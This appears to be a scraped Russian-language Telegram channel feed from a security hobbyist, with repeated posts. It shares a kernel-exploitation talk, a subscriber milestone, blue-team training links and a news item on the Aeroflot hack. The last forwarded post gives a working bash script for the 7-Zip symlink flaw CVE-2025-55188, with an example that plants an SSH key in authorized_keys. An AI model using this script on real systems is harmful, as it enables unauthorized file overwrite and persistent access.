Итак, я к вам с лютым подгоном 😎
Мой хороший друг и сокомандник Валера @d1sgr4c3 выступал вчера на пыхе с докладиком на тему перехвата управления в ядре Linux👾
Если не видели, то вот 👉👈
Выступление: https://phdays.com/ru/forum/program/?date=2025%2F5%2F23&searchString=%D0%92%D0%B0%D0%BB%D0%B5%D1%80&talk-id=2290
Потыкаться самому: https://github.com/d1sgr4c3/boffer
Мой хороший друг и сокомандник Валера @d1sgr4c3 выступал вчера на пыхе с докладиком на тему перехвата управления в ядре Linux
Если не видели, то вот 👉👈
Выступление: https://phdays.com/ru/forum/program/?date=2025%2F5%2F23&searchString=%D0%92%D0%B0%D0%BB%D0%B5%D1%80&talk-id=2290
Потыкаться самому: https://github.com/d1sgr4c3/boffer
Please open Telegram to view this post
VIEW IN TELEGRAM
❤14
Проснулся, значится, я сегодня утром, и первое, что увидел- Телеграм пишет мне, что я популярен🤯
1000 человек наблюдает за мной... не верится даже...
А если серьезно, то спасибо всем вам за это. Я искренне рад, что моя маленькая отдушина в виде этого канала интересна людям и, так или иначе, помогает узнать что-то новое.
По-прежнему, и дальше буду радовать вас контентом❤️🔥
Старичкам и недавним участникам респект, будущим подписчикам салам😎
Cheers🥂
1000 человек наблюдает за мной... не верится даже...
А если серьезно, то спасибо всем вам за это. Я искренне рад, что моя маленькая отдушина в виде этого канала интересна людям и, так или иначе, помогает узнать что-то новое.
По-прежнему, и дальше буду радовать вас контентом
Старичкам и недавним участникам респект, будущим подписчикам салам😎
Cheers
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Райтапы по CTF{2025}
Оп, хлоп, мы идем в Blue Team 💙🛡️
Хочу поделиться несколькими полезными ресурсами от сокурсника в практикуме:
1. Blue Team Labs Online — отличная платформа для отработки навыков киберзащиты.
2. CyberDefenders — еще один ресурс с практическими задачами и тренировками.
А также — большая база знаний, где собраны ссылки на курсы, сертификаты, стажировки и многое другое:
👉 Notion-сборник от Алексея Пыринова
💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
#рекомендация@writeup_ctf
Хочу поделиться несколькими полезными ресурсами от сокурсника в практикуме:
1. Blue Team Labs Online — отличная платформа для отработки навыков киберзащиты.
2. CyberDefenders — еще один ресурс с практическими задачами и тренировками.
А также — большая база знаний, где собраны ссылки на курсы, сертификаты, стажировки и многое другое:
👉 Notion-сборник от Алексея Пыринова
#рекомендация@writeup_ctf
Please open Telegram to view this post
VIEW IN TELEGRAM
CyberDefenders
CyberDefenders - Blue Team Training Platform
Blue team training platform for SOC analysts, threat hunters, DFIR, and security blue teams to advance CyberDefense skills.
❤8
Админ не забил на канал, у админа кибермеланхолия👾
Скоро вернусь, ждите😘
Скоро вернусь, ждите
Please open Telegram to view this post
VIEW IN TELEGRAM
🙏9
Forwarded from Топор. Экономика.
⚡️⚡️Хакеры взломали «Аэрофлот» — хакерская группировка заявила о полном уничтожении внутренней ИТ-инфраструктуры авиакомпании. По заявлению хакеров, они находились внутри корпоративной сети больше года — выгружали историю перелётов и готовили диверсию. По их данным, уничтожено порядка 7000 физических и виртуальных серверов, получено более 20 Тб данных, включая корпоративную почту и внутренние документы. Ущерб от атаки может исчисляться десятками миллионов долларов.
Атака названа «стратегическим ударом» по цифровой безопасности компании и государственных структур. Тем временем «Аэрофлот» массово отменяет и переносит рейсы сразу в нескольких регионах, объясняя это «сбоем информационных систем». @ecotopor
Атака названа «стратегическим ударом» по цифровой безопасности компании и государственных структур. Тем временем «Аэрофлот» массово отменяет и переносит рейсы сразу в нескольких регионах, объясняя это «сбоем информационных систем». @ecotopor
🙏1
Forwarded from Proxy Bar
CVE-2025-55188
7z-exploit
Symlink Arbitrary File
7-Zip до 25.01.
Уязвимость возникает из-за того, что 7-Zip неправильно обрабатывает сим линки во время извлечения, что позволяет созданному архиву перезаписывать файлы в системе.
7z-exploit
Symlink Arbitrary File
7-Zip до 25.01.
Уязвимость возникает из-за того, что 7-Zip неправильно обрабатывает сим линки во время извлечения, что позволяет созданному архиву перезаписывать файлы в системе.
#!/bin/bash
if [ "$#" -ne 3 ]; then
echo "Usage: $0 <payload_file> <target_symlink_path> <output_archive>"
echo "Example: $0 mykey.pub ../../.ssh/authorized_keys exploit.7z"
exit 1
fi
PAYLOAD="$1"
TARGET="$2"
OUT="$3"
WORKDIR=$(mktemp -d)
ln -s "$TARGET" "$WORKDIR/symlink"
cp "$PAYLOAD" "$WORKDIR/symlink"
tar --sort=name -cf "$WORKDIR/exploit.tar" -C "$WORKDIR" symlink
7z a "$OUT" "$WORKDIR/exploit.tar" >/dev/null
echo "[*] Exploit archive created: $OUT"
rm -rf "$WORKDIR"